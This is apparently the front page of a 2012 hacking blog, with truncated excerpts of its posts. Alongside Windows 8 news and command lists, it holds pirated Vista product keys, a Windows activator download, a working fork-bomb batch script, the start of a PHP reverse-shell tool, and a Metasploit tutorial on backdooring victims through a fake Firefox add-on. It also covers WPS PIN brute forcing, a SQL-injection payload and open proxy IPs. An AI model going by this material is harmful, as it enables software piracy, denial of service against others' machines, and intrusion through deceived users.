Wednesday, June 27, 2012

Windows 8 Command Line List and Reference

One of the bugs in the beta version seems to be that this entry for the command prompt sometimes gets greyed out. Another route to the command prompt is to place the mouse on the bottom-left corner of the screen and right-click the tile that pops up. The context menu contains an entry both for the regular command line and for the commannd line run as administrator. Another way to the command prompt will be familiar. Use the keyboard shortcut Winkey+R to open the Run line and then enter "cmd" (without quotes). Once the command shell is open, it looks pretty similar to previous versions List of commands in Windows 8 ASSOC Displays...

A to Z linux commands

Here are some linux commands for you so you can make your hands more and more dirty with ubuntu terminal. mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem mknod Make block or character special files more Display output one screen at a time mount Mount a file system mtools Manipulate MS-DOS files mtr Network diagnostics (traceroute/ping) mv Move or rename files or directories adduser Add a user to the system addgroup Add a group to the system alias Create an alias • apropos Search Help manual pages (man -k) apt-get Search for and install software packages (Debian/Ubuntu) aptitude Search for and install software packages...

Saturday, June 23, 2012

Announcing the Windows 8 Editions

Windows 8 has the flexibility you need - whether you’re on an x86/64 or a WOA PC. You can use a touch screen or a keyboard and mouse – and switch anytime. It’s beautiful, fast, and fluid design is perfect for a wide range of hardware. And you’ll love browsing through the Windows Store and downloading all the apps you want. And those apps can work together too so you can share photos, maps, contacts, links and whatever else you want faster and easier. All editions of Windows 8 offer a no-compromise experience. First, Windows 8 is the official product name for the next x86/64 editions of Windows. For PCs and tablets powered by x86...

Friday, June 22, 2012

Free Windows 8 Download

Windows 8 is the codename for the upcoming version of Microsoft Windows that follows, it is a bold shift from Windows 7 and represents Microsoft’s new direction. but now Windows 8 is under development, We don’t know when the windows 8 will be released, but we can experience the Windows 8 beta version, to feel and outlook the next-generation Microsoft Windows System:Windows 8, Here we will share the lastest Windows 8 download, you can downlaod it free:.  Minimum system requirements- 1 GHz or faster 32-bit (x86) or 64-bit (x64) processor 16 GB available hard disk space (32-bit) or 20 GB (64-bit) 1 GB RAM (32-bit) or 2 GB...

Thursday, June 21, 2012

Botnets Working Techniques And its Commands

A botnet is a collection of compromised computers, each of which is known as a 'bot', connected to the Internet. When a computer is compromised by an attacker, there is often code within the malware that commands it to become part of a botnet. The "botmaster" or "bot herder" controls these compromised computers via standards-based network protocols such as IRC and http Types of attacks- Denial-of-service attacks where multiple systems autonomously access a single Internet system or service in a way that appears legitimate, but much more frequently than normal use and cause the system to become busy. Adware exists to advertise...

Tuesday, June 19, 2012

Windows 7 Activator + Loader Download

Activate Your Windows 7 OS From trial to genuine Version using the Activator or Loader.. Download The Tool given below.. Click Here to Download Share your comments....

Monday, June 18, 2012

Vista, Server & Windows 7 Activation keys

###################################################### OS  |  Type   |  Brand  |  Key######################################################Vista|Ultimate|Acer|3YDB8-YY3P4-G7FCW-GJMPG-VK48CVista|Ultimate|Advent|39MVW-K8KKQ-BGJ9B-24PMW-RYQMVVista|Ultimate|Alienware|7QVFM-MF2DT-WXJ62-XTYX3-P9YTTVista|Ultimate|Asus|6F2D7-2PCG6-YQQTB-FWK9V-932CCVista|Ultimate|Dell|2QBP3-289MF-9364X-37XGX-24W6PVista|Ultimate|DixonXP|6JPQR-4G364-2B7P7-83FXW-DR8QCVista|Ultimate|Gateway|6P8XK-GDDTB-X9PJQ-PYF36-G8WGVVista|Ultimate|Hedy|7R2C3-DWCBG-C8G96-MPT8T-K37C7Vista|Ultimate|HP|23CM9-P7MYR-VFWRT-JGH7R-R933GVista|Ultimate|Lenovo|24J6Q-YJJBG-V4K4Q-2J8HY-8HBQQVista|Ultimate|OQO|C4QGV-XHYYT-9PW8R-DCFTQ-FBD6MVista|Ultimate|Toshiba|33G3W-JY3XQ-CQQ7C-TG96R-R6J6QVista|Ultimate|Sony|2KKTK-YGJKV-3WMRR-3MDQW-TJP47Vista|Business|Acer|2TJTJ-C72D7-7BCYH-FV3HT-JGD4FVista|Business|Asus|72PFD-BCBK8-R7X4H-6F2XJ-VVMP9Vista|Business|Dell|368Y7-49YMQ-VRCTY-3V3RH-WRMG7Vista|Business|Fujitsu|4C3CM-H3RXM-VBMVQ-K8RHX-RTFX8Vista|Business|Gateway|9GK24-BJJPV-93JB4-9CD3T-QTHDDVista|Business|HP|2Q2WM-VCB98-8C6BG-C9BT2-3XDRYVista|Business|Lenovo|2YRV9-YCY3F-FRJ4T-BKD6B-C47PPVista|Business|MSI|2X4F8-Y4QGK-Y8RTT-CK6PB-M8X92Vista|Business|OQO|KBK7F-XCVK4-9W477-GPFVC-YXFDMVista|Business|Sony|3W2Y2-GRRYB-VH76X-KPDXX-XFJ4BVista|Business|Toshiba|38MK6-4QYC6-GJQQX-9DYQ4-H9MQDVista|BusinessN|Acer|2434H-HFRM7-BHGD4-W9TTD-RJVCHVista|HomeBasic|Acer|2W7FD-9DWCB-Q9CM8-KTDKK-8QXTRVista|HomeBasic|Asus|762HW-QD98X-TQVXJ-8RKRQ-RJC9VVista|HomeBasic|Benq|7R997-DXYDR-YGCR3-RHVDP-T8TKXVista|HomeBasic|CHS|2QM7G-GTFJ4-2DTTG-R73YR-W3D8GVista|HomeBasic|Dell|3YMR2-WMV49-4WD8X-M9WM7-CH4CGVista|HomeBasic|Fujitsu|4G8P7-TVW66-Y3H3V-C4Q4J-CQR2BVista|HomeBasic|Gateway|7Q3BC-897QP-6HVMF-TTJ34-P92J4Vista|HomeBasic|Gericom|MDRBF-FKHJB-6J8RV-P4GKQ-G6BR8Vista|HomeBasic|Gigabyte|889T3-F4VGX-QK4V7-JH76R-3HHRCVista|HomeBasic|HP|2VX48-BVXT6-GD2PK-BD3R2-44MV3Vista|HomeBasic|Ksystem-Irbis|J2QKK-V8M3X-WRPPT-FBW4B-FQ6FPVista|HomeBasic|Lenovo|2WP98-KHTH2-KC7KG-4YR37-H8PHCVista|HomeBasic|LG|6DT3K-TCY4G-Y2VK9-T8J3T-2RGT7Vista|HomeBasic|Mecer|C3MXB-T6PGC-2M2XV-C6PRX-TPW79Vista|HomeBasic|Medion|3XFY9-7GTXV-93RXP-V62MQ-84WP6Vista|HomeBasic|NEC|2432B-Q9RGP-VT9CK-64JFP-X6XVTVista|HomeBasic|Packard...

Sunday, June 17, 2012

Prevent your website from SQL Injection vulnerability

MySQL Injection is a type of attack where an end user may hack your database from his browser itself. Here my main attempt will sql injection prevention. What will be your SQL statement to retrieve a username and a password when we login to your website? In most cases this will be like SELECT 1 FROM user WHERE username=’ABC’ AND password=’1234’; Now think if a user fills data something like this: username=  ABCD password=  ‘ or ’1′=’1 Now check your SQL query. It has changed now.   SELECT 1 FROM user WHERE username=’ABCD’ AND password= ’’ OR ‘1’ = ’1’ ; Now with this query a user with an invalid...

Proxy lists for India

Proxy's for India- Below you will find the list of proxy IP addresses and ports only Proxy IPProxy port                                                                   202.65.158.179        8080 59.161.254.105        80 61.16.234.188       ...

6 Ways to Protect Your Blog from being Hacked

1. Have Strong Passwords, and Change them Regularly- The first step you should take to protect your blog from being hacked is to have a password that is very strong. You’ll be surprised at how simple the password some people use is, and they end up complaining when they’re hacked. Make sure your password doesn’t contain your name, address, or even date of birth. Use something nobody can ever associate with you, and don’t ever talk about your password to anybody. Also make sure you change your password regularly; like every 3-6 months, and you will be able to protect yourself from being trailed by a hacker. 2. Have More than One...

Friday, June 15, 2012

Reaver-wps WPA/WPA2 Cracking

So whats Reaver- Reaver performs a brute force attack against an access point's WiFi Protected Setup pin number. Once the WPS pin is found, the WPA PSK can be recovered and alternately the AP's wireless settings can be reconfigured. While Reaver does not support reconfiguring the AP, this can be accomplished with wpa_supplicant once the WPS pin is known.  Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because...

Thursday, June 14, 2012

Hacking Windows 7 & Xp with Fake Firefox add-on (XPI) : Metasploit Tutorials

>What am i doing? 1. Create a fake firefox extension with Metasploit that creates a backdoor from the victim system. 2. Trick users into installing the add-on 3. Break into the Target Machine. >Pre-configuration: *. As usual, you have to set up two virutal machines(VM ) in your virtualbox namely "Target"and "Attacker". *. Install the windows xp or 7 in the Target VM. *. Install the Backtrack in the Attacker VM. >Part I: Update the Metasploit- As we are going to use the latest module, you are advised to update the Metasploit modules. Don't know how to do this? No need to worry! *. Open the Terminal *. type msfupdate *. This...

How to make a Fork Bomb (rabbit virus)

Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software.. Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt One more thing... I am not responsible if you kills your computer or somebody else computer with or without permission.. Now that we have that out a the way here we go... Blocks of code should be set as style "Formatted" like this. Code: .bat :s START %0 GOTO :s >Run this boy from a flash drive so you can see how it works and pull the drive to stop it.. LIKE AND COMMEN...

Back connect Shell | Reverse Shell in PHP

Back Connect Shell also known as Reverse Shell is a Piece of Code which is used to Host a Shell on the Server or the Victim, But instead of sitting there and listening for connections (As in the Case of Bind Shell) it rather Connects Back to the Attacker Machine. In this tutorial i’ll be making a Back Connect Shell in PHP- Code- back-connect.php >Code: php <?php /********************* @@author : Kumaran @@facebook : facebook.com/hackersgrp @@Email : mail4hackersgrp@gmail.com ********************/ ini_set ( 'max_execution_time' , 0 ) ; ?> <html> <head> <title>Back Connect Shell -- PHP</title> </head>...
Page 1 of 5812345Next

 
Design by Secure Hackers